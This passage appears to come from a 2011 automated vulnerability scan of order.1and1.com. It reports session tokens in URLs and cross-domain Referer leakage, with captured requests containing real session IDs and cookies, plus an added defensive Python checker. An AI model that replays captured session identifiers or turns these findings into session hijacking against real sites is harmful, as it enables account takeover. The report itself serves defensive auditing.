Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:35:53 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupWebsiteMagazine?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.118. http://order.1and1.com/xml/order/sitedesign

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/sitedesign

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/sitedesign;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:54 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/sitedesign?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.119. http://order.1and1.com/xml/order/tariffselect

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/tariffselect

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-beginner-package-bundle HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 17:37:27 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642647822&__frame=_top&__lf=Static
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=UaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 20:51:34 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 0


3.120. http://order.1and1.com/xml/webservice/VDSPriceService

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/webservice/VDSPriceService

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /xml/webservice/VDSPriceService;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
Origin: http://order.1and1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: text/plain
wstype: jsonws
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC4uLSspKy4=
Content-Length: 57

{"method":"getVDSPrice","params":[1,1,100,"vdslinuxset"]}

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:59 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/plain;charset=utf-8
Content-Length: 249

{"result":{"errorMessage":null,"priceBrutto":{},"price":{},"error":false,"priceStringBrutto":"49.99","errorCode":null,"campaignPriceBrutto":{},"campaignPriceString":"0.00","campaignPriceStringBrutto":
...[SNIP]...

4. Cross-domain Referer leakage
There are 18 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit sensitive information within the URL, whether in the query string or in the path. In addition to being leaked in the Referer header, such information may be logged in various locations (proxy and server access logs, browser history) and may be visible on-screen to untrusted parties. The requests listed below are a concrete case: the session identifier is carried as a URL-rewritten path parameter (;jsessionid=...), and the Referer header shown in 4.1 demonstrates the browser forwarding that full URL, session identifier included. Session identifiers belong in a cookie only; for servlet containers this means disabling URL rewriting of the session ID (Servlet 3.0: <session-config><tracking-mode>COOKIE</tracking-mode></session-config> in web.xml). Whether a given instance is exploitable depends on whether the receiving domain is trusted and whether a captured identifier is still valid when it is replayed.
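The following is an added example, not part of the original scan report, that reproduces the check described in the issue background and remediation: given a raw HTTP request and the HTML it returned, it reports whether the originating URL carries anything that looks like a session token (in the query string or, as in the requests below, in a ;jsessionid=... path parameter), and lists every link in the response that points at another host, since those are the fetches whose Referer header will carry that URL. The request line and response fragments are constructed from the 4.1 instance; the SENSITIVE_NAMES list and the assumption that a relative request target is served over plain http are the author's own.

```python
"""Cross-domain Referer leakage check (added example, not scanner code).

Given a raw HTTP request and the HTML it returned, report:
  (a) sensitive-looking parameters in the originating URL, looking both in
      the query string and in servlet-style ;name=value path parameters;
  (b) links in the response whose host differs from the origin host, i.e.
      the requests whose Referer header will carry the originating URL.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urljoin, urlsplit

# Parameter names that commonly carry session or auth material.
# Assumption: tune this list for the application under test.
SENSITIVE_NAMES = {"jsessionid", "phpsessid", "sessionid", "sid", "token", "auth"}


class _LinkCollector(HTMLParser):
    """Collects href/src/action attribute values from every start tag."""
    ATTRS = {"href", "src", "action"}

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in self.ATTRS and value:
                self.links.append(value)


def parse_request(raw):
    """Return the absolute origin URL from a raw HTTP/1.1 request.

    Assumption: a relative request target is served over plain http, as in
    the requests on this page; an absolute-form target is used as-is.
    """
    lines = raw.strip().splitlines()
    _method, target, _version = lines[0].split(" ", 2)
    if target.startswith("http://") or target.startswith("https://"):
        return target
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return "http://" + headers["host"] + target


def sensitive_in_url(url):
    """Names of sensitive-looking parameters in the URL's path or query."""
    parts = urlsplit(url)  # urlsplit keeps ;params inside .path
    found = []
    # URL rewriting puts the session id in a path parameter: /page;jsessionid=XYZ
    for segment in parts.path.split("/"):
        for param in segment.split(";")[1:]:
            name = param.split("=", 1)[0].lower()
            if name in SENSITIVE_NAMES:
                found.append(name)
    for name in parse_qs(parts.query, keep_blank_values=True):
        if name.lower() in SENSITIVE_NAMES:
            found.append(name.lower())
    return found


def cross_domain_links(origin_url, html):
    """Absolute URLs in the response whose host differs from the origin's host."""
    origin_host = urlsplit(origin_url).hostname
    collector = _LinkCollector()
    collector.feed(html)
    out = []
    for link in collector.links:
        absolute = urljoin(origin_url, link)  # resolves relative and //protocol-relative links
        host = urlsplit(absolute).hostname
        if host and host != origin_host:
            out.append(absolute)
    return out


def check(raw_request, html):
    """Combine both checks for one request/response pair."""
    origin = parse_request(raw_request)
    return {
        "origin": origin,
        "sensitive": sensitive_in_url(origin),
        "cross_domain": cross_domain_links(origin, html),
    }


# Constructed sample input, abridged from instance 4.1 below.
SAMPLE_REQUEST = (
    "GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a"
    "?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1\r\n"
    "Host: order.1and1.com\r\n"
    "Referer: http://order.1and1.com/xml/order/MsHosting\r\n\r\n"
)
SAMPLE_HTML = """<html><body>
<img src="//img.1und1.de/OdinPrice/grey/m/none/0/50/dollar/month.png" alt="price">
<a href="/xml/order/Hosting">same host, not reported</a>
<img src="http://www.wsm-demoversion.com/tinc?key=jwW6a5W7" alt="map">
</body></html>"""

if __name__ == "__main__":
    result = check(SAMPLE_REQUEST, SAMPLE_HTML)
    print("origin:      ", result["origin"])
    print("sensitive:   ", result["sensitive"])
    for url in result["cross_domain"]:
        print("cross-domain:", url)
```

On the sample the script flags jsessionid from the path parameter (the query-string parameters __frame, __lf, linkOrigin and linkId are not session material) and lists the two image hosts, img.1und1.de and www.wsm-demoversion.com, as the destinations that will receive the session-bearing URL in the Referer header. A finding is only a real exposure when a listed host is untrusted and the identifier is still valid, which is the judgement the issue background asks you to make per domain.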


4.1. http://order.1and1.com/xml/order/CloudDynamicServer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:22 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1MjAwLy0rLTA=; Expires=Fri, 07-Apr-2079 21:07:29 GMT; Path=/
ETag: 9efbb6be51ecd3a77db1d7f5b7bc91f5
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63287


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" id="vds-price-default-img" width="58" height="44" src="//img.1und1.de/OdinPrice/grey/m/none/0/50/dollar/month.png" alt="from 0,50 &#8364;/month*"><span class="horz-l-price-reg">
...[SNIP]...
<span class="dcs-price"><img class="price-graphic alphapng" id="vds-price" width="121" height="83" src="//img.1und1.de/OdinPrice/blue/xl/dollar/0/00/none/month-star.png" alt="from 0,00 &#8364;/month*"></span>
...[SNIP]...

4.2. http://order.1and1.com/xml/order/Eshops

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:36 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; Expires=Fri, 07-Apr-2079 21:47:43 GMT; Path=/
ETag: 864e2e4f35ed6ab3549b3f5dceba36dd
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64223


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="47" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="47" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...

4.3. http://order.1and1.com/xml/order/FeatureSite-buildingMap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMap

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:37 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:57:44 GMT; Path=/
ETag: 645ffb56b5336d5e93c4fb610365ea26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18055


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</h3><img src="http://www.wsm-demoversion.com/tinc?key=jwW6a5W7" alt="map headquarters"><br>
...[SNIP]...

4.4. http://order.1and1.com/xml/order/Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykcJWx1Oy4vKyovKyksKiQsIyI=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
ETag: ad36f49218ed966c510ceb30c0b54c6f
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36434


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/99/none/month-star.png" alt="$ 0.99"></span>
...[SNIP]...
<span class="container"><img class="price-graphic alphapng alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/9/99/none/month-star.png" alt="$ 9.99"></span>
...[SNIP]...
rel="scrollbars=no,width=557,height=442" href="/xml/deref?link=https%3A%2F%2Fwww.scanalert.com%2FRatingVerify%3Fref%3Dwww.1and1.com&amp;__sign=f933cb0d2dddc861112b1d01266184f9&amp;__ts=1300632652931"><img alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" class="mcafee" src="//images.scanalert.com/meter/www.1and1.com/22.gif" width="115"></a>
...[SNIP]...

4.5. http://order.1and1.com/xml/order/Hosting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 20:51:28 GMT; Path=/
ETag: 1c80cdab16ac208079c7642ff888736c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59725


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/3/99/none/month.png" alt="ab 3.99 &#8364;/Monat*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
